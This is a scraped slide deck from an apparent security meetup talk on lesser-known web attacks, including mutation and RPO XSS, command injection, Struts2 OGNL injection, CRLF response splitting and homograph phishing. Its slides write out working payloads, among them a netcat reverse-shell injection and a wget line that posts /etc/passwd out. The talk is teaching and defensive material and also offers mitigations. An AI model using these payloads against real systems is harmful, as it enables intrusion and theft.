Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 

Null 14 may_lesser_known_attacks_by_ninadsarang

  • 2. LesserKnownWebAppAttacks About me   Consultant atAujas Networks  Part time bug hunter  Individual Security researcher  Blogger http://infinite8security.blogspot.in
  • 3. LesserKnownWebAppAttacks Menu Card Cross site scripting –  Mutation XSS  RPO XSS  Zombie XSS Remote Command Execution CR-LF Attack Homograph Attack
  • 4. It’s all about PoPuP LesserKnownWebAppAttacks Cross site Scripting- Mutation XSS
  • 5. LesserKnownWebAppAttacks  HTML encoded payload <listing>&lt;img src=1 onerror=alert(1)&gt;</listing>  we will put this piece of code into another code using innerHTML property. <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing> <script>alert(document.getElementById('x').innerHTML)</script>  When this code will execute, browser will read innerHTML and call document.getElementById(‘x’)  Resulting in multiple level of decoding and mutate from safe to unsafe state.
  • 8. LesserKnownWebAppAttacks Mitigation: Server-side mitigation • Avoiding outputting server content otherwise incorrectly converted by the browser. • The flawed content should be replaced with semantically equivalent content which is converted properly by the browser. Client-side mitigation • Browsers should implement ECMA Script 5 and higher. • TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all of the user agents. • https://cure53.de/fp170.pdf
  • 9. LesserKnownWebAppAttacks Cross site Scripting- RPO XSS Relative path Overwrite xss • Difference between Absolute and Relative url • Absolute URL: https://thehacker.co.in/test • Relative URL: test/some_subdirectory To exploit this findings three things are necessary, 1) stored XSS that allows CSS injection. 2) URL Rewriting. 3) Relative addressing to CSS style sheet.
  • 10. LesserKnownWebAppAttacks D E M O • Step 1: Lets visit www.webdevelopersnotes.com/graphics/index.php3 • To check URL re-writing add ‘/’ • Open re-writed url with xss payloadin IE and see the Magic ;) • http://challenge.hackvertor.co.uk/ xss_horror_show/chapter7/rpo.php/ Mitigation: • It is recommended that absolute URLs should be used throughout a site. • Otherwise relative root url should be used.
  • 14. www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash Remote/OS Command Execution LesserKnownWebAppAttacks
  • 15. LesserKnownWebAppAttacks Now what if ( ; ) is blocked by the application?  X ;Y = Seperating Commands (Run X and then Y, regardless of success of X)  X |Y = PIPE (Run X and pass output of X toY)  X ^Y = PIPEZ  X &&Y =AND (RunYif X succeeded )  FAIL||Y = OR (RunYif X failed)  X %0D Y%0D Z = OR  ` X ` = Backtick  ` X &Y` = Background (RunYand then run X in background, regardless of success of X)  $( command )  nc -e /bin/sh = Netcat  wget --post-file /etc/passwd = WGET
  • 16. LesserKnownWebAppAttacks RCE never dies!!! • "action:", "redirect:" or "redirectAction:" is not properly sanitized. • information will be evaluated as OGNL (Object-Graph Navigation Language) expression against the value stack, this introduces the possibility to inject server side code. Apache struts2 RCE http://host/struts2- blank/example/X.action?action:${3*4}
  • 18. LesserKnownWebAppAttacks Divide and Conquer cR-LFAttack • CR stands for Carriage Return (CR,ASCII 13, r) • LF stands for Line feed (LF, ASCII 10, n) How this Attack work? The server script embeds user data in HTTP response headers. Example: Step1: There is redirection page “redir_lang.jsp” When we hit index page server responds with following response <% response.sendRedirect("/by_lang.jsp?lang="+ request.getParameter("lang")); %>
  • 20. LesserKnownWebAppAttacks Lets Attack ;) Step 3: Instead of passing value as English. Lets pass our attack vector as shown. /redir_lang.jsp?lang=foobar%0d%0aContentLength :%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont entType:%20text/html%0d%0aContentLength:%2019% 0d%0a%0d%0a<html>Shazam</html> Note: We have URLencoded the CRLF sequences Lets see what server responds with 
  • 21. LesserKnownWebAppAttacks A first HTTP response, which is a 302 (redirection) response. A second HTTP response, which is a 200 response, with a content comprising of 19 bytes of HTML. Superfluous data
  • 22. So when the attacker feeds the target with two requests, the first being to the URL /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d% 0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont entLength:%2019%0d%0a%0d%0a<html>Shazam</html> And the second to the URL > /index.html The target would believe that the first request is matched to the first response: And the second request (to /index.html) is matched to the second response: LesserKnownWebAppAttacks
  • 23. What Attacker can do by CRLF attack?  Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection  Web Cache Poisoning (defacement)  Cross User attacks (single user, single page, temporary defacement)  Hijacking pages with user-specific information  Browser cache poisoning LesserKnownWebAppAttacks
  • 24. LesserKnownWebAppAttacks Homograph Attack Can you tell the difference? 1) https://ebаy.com/ 2) https://ebay.com/
  • 26. LesserKnownWebAppAttacks What is this all about? http://ebаy.com/ Decoding to punycode http://xn--eby-7cd.com/ Cyrillic alphabets
  • 27. LesserKnownWebAppAttacks What Attacker can do by Homograph attack?  Phishing  Un-validated Redirection  Fake websites  Attacker may combine this with SSLattacks http://www.blackhat.com/presentations/bh-dc- 09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
  • 29. Thank You Reach me @ LinkedIn: Ninad Sarang Twitter: @hbkninad